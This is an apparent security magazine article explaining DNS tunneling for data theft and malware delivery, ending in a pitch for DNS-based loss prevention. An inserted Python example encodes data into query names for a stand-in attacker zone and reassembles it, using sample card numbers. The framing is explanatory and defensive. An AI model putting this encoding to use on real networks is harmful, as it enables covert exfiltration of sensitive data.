DNS tunneling encodes other traffic (typically IP or TCP streams) inside DNS queries and
responses on port 53, a port that many firewalls, next-generation firewalls included, forward
without inspecting the payload. The most common goal is data exfiltration. A malicious insider,
or malware already running inside the network, establishes a DNS tunnel from within the
network, encrypts the data to be stolen and embeds it in chunks in DNS queries for a domain the
attacker controls. The attacker's name server receives those queries, decrypts the chunks and
reassembles them to recover the valuable information.

Almost anything, SSH and HTTP sessions included, can be tunneled over DNS, encrypted and
compressed, much to the dismay of network administrators and security staff. DNS tunneling has
been around for a long time, and several tunneling toolkits are widely used: Iodine, which is
often considered the gold standard; OzymanDNS; SplitBrain; DNS2TCP; TCP-over-DNS; and
others.

There are also newer contenders that tunnel at much higher throughput and offer many more
features. Commercial services have even appeared that sell VPN access over DNS, which lets a
user bypass many Wi-Fi captive-portal and access controls. Most of these tools have specific
signatures, such as characteristic query types and name encodings, that can be used for
detection and mitigation.

DNS is not only used for data leakage, but also to move malicious code into a network. This
infiltration is easier than you might think. Attackers can prepare a binary, encode it, and carry it
past firewalls and content filters into an organization's network in DNS responses (for example in
TXT records). Sending and receiving data over DNS in this way effectively turns it into a covert
transport protocol.
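The chunk, encode and reassemble mechanism described above, for both the outbound (exfiltration) and the inbound (infiltration) direction, as an added example that is not code from the article or from any of the tools it names. It assumes an attacker-controlled zone t.example.com (hypothetical) and a query-name layout, <seq>-<total>-<session>.<base32 labels>.t.example.com, invented here for illustration; real tools use their own formats. Encryption is left out so that the encoding stays visible; in practice each chunk would be encrypted before it is base32-encoded, and for the inbound direction the same chunks travel in response data (TXT strings) instead of query labels.

```python
import base64
import re
from typing import Dict, List, Optional

# Assumed attacker-controlled zone (hypothetical); the tunnel's authoritative
# name server for this zone is the receiving end.
TUNNEL_DOMAIN = "t.example.com"
MAX_LABEL = 63     # RFC 1035: a single label is at most 63 octets
MAX_NAME = 253     # RFC 1035: a full name in text form is at most 253 chars
CHUNK_SIZE = 30    # 30 raw bytes -> 48 base32 chars, so no '=' padding


def encode_chunks(data: bytes, session: str = "s1") -> List[str]:
    """Split `data` into chunks and embed each one in a DNS query name.

    Name layout (invented for this example):
        <seq>-<total>-<session>.<base32 labels>.<TUNNEL_DOMAIN>
    Base32 is used because DNS names are case-insensitive and limited to
    letters, digits and hyphens; the '=' padding is stripped here and
    restored by the receiver.
    """
    chunks = [data[i:i + CHUNK_SIZE] for i in range(0, len(data), CHUNK_SIZE)]
    names = []
    for seq, chunk in enumerate(chunks):
        b32 = base64.b32encode(chunk).decode("ascii").rstrip("=").lower()
        # Long chunks are split across several labels to respect the 63-octet limit.
        labels = [b32[j:j + MAX_LABEL] for j in range(0, len(b32), MAX_LABEL)]
        name = f"{seq}-{len(chunks)}-{session}." + ".".join(labels) + "." + TUNNEL_DOMAIN
        if len(name) > MAX_NAME:
            raise ValueError("encoded query name exceeds 253 characters")
        names.append(name)
    return names


HEADER = re.compile(r"^(\d+)-(\d+)-([a-z0-9]+)$")


def reassemble(names: List[str], session: str = "s1") -> Optional[bytes]:
    """Rebuild the payload from query names seen at the tunnel's name server.

    Queries can arrive out of order or more than once (resolver retries), so
    chunks are keyed by sequence number and the payload is only returned once
    every sequence number for the session is present.
    """
    suffix = "." + TUNNEL_DOMAIN
    chunks: Dict[int, bytes] = {}
    total: Optional[int] = None
    for name in names:
        name = name.lower().rstrip(".")
        if not name.endswith(suffix):
            continue                       # query for some other name, ignore
        labels = name[:-len(suffix)].split(".")
        m = HEADER.match(labels[0])
        if not m or m.group(3) != session:
            continue                       # malformed header or another session
        seq, total = int(m.group(1)), int(m.group(2))
        b32 = "".join(labels[1:]).upper()
        b32 += "=" * (-len(b32) % 8)       # restore base32 padding
        chunks[seq] = base64.b32decode(b32)
    if total is None or any(i not in chunks for i in range(total)):
        return None                        # transfer still incomplete
    return b"".join(chunks[i] for i in range(total))


if __name__ == "__main__":
    # Constructed sample payload; not real data.
    secret = b"card numbers: 4111111111111111, 5500000000000004\n"
    queries = encode_chunks(secret)
    for q in queries:
        print(q)
    # Simulate reordering and a duplicated query on the receiving side.
    print(reassemble(list(reversed(queries)) + [queries[0]]) == secret)
```

The receiver side is where the practical caveats live: it must tolerate duplicates and reordering, reject names for other sessions, and never trust the header counts blindly (a hostile sender could announce a huge total). The sender side shows why such traffic stands out on the wire: every query carries a long, high-entropy subdomain under one zone.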

Don’t Become the Next Data Breach Victim
DNS is an ideal enforcement point for improving your organization’s security posture. It is close
to the endpoints, ubiquitous, and directly in the path of DNS-based exfiltration. While DLP
solutions protect against data leakage via email, web, FTP, and other vectors, most have no
visibility into DNS-based exfiltration. To maximize your chances of stopping these data theft
attempts, complement traditional data loss prevention with a DNS-based solution.


About the Author

Mr. Sleiman has more than 20 years of sales, technical and business
experience with some of the world’s leading networking and
telecommunications technology companies. He has held key executive
roles, including chief operating officer and chief technology officer at Core
Communications, a software and IT services company focused on cloud-based
business services and web and mobile apps. He spent more than six
years at Cisco in various leadership positions, the last being senior director,
leading the enterprise business for Middle East and Africa. He also
developed the strategic vision and technology roadmap, and managed all
aspects of research and development, for Nortel Networks in his role as CTO, Enterprise
Business Unit.

47 Cyber Warnings E-Magazine – March 2016 Edition
Copyright © Cyber Defense Magazine, All rights reserved worldwide
